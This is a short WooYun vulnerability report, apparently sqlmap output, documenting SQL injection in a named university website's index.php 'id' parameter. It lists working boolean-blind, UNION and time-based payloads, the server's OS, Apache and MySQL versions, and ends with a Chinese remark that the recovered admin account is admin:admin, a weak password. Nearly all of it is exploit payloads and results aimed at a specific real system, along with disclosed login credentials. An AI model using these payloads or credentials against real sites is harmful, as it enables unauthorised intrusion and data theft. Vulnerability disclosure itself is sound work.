WooYun.org

注入点：http://web2.gdupt.edu.cn/zzzx/index.php?m=index&a=content&id='60'
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=index&a=content&id='60') AND 4282=4282 AND (7038=7038
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: m=index&a=content&id=-4296) UNION ALL SELECT CONCAT(0x7162646871,0x726a685871746d457768,0x7173736c71),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: m=index&a=content&id='60') AND SLEEP(5) AND (3857=3857
---
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
注入得到账户admin:admin，哎其实就是个弱口令。。。。